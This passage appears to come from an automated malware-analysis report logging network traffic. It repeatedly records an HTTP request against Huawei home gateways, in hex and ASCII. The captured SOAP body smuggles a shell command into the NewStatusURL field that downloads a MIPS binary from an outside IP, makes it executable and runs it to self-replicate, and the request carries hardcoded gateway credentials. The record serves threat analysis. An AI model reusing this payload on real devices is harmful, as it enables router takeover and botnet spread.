50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 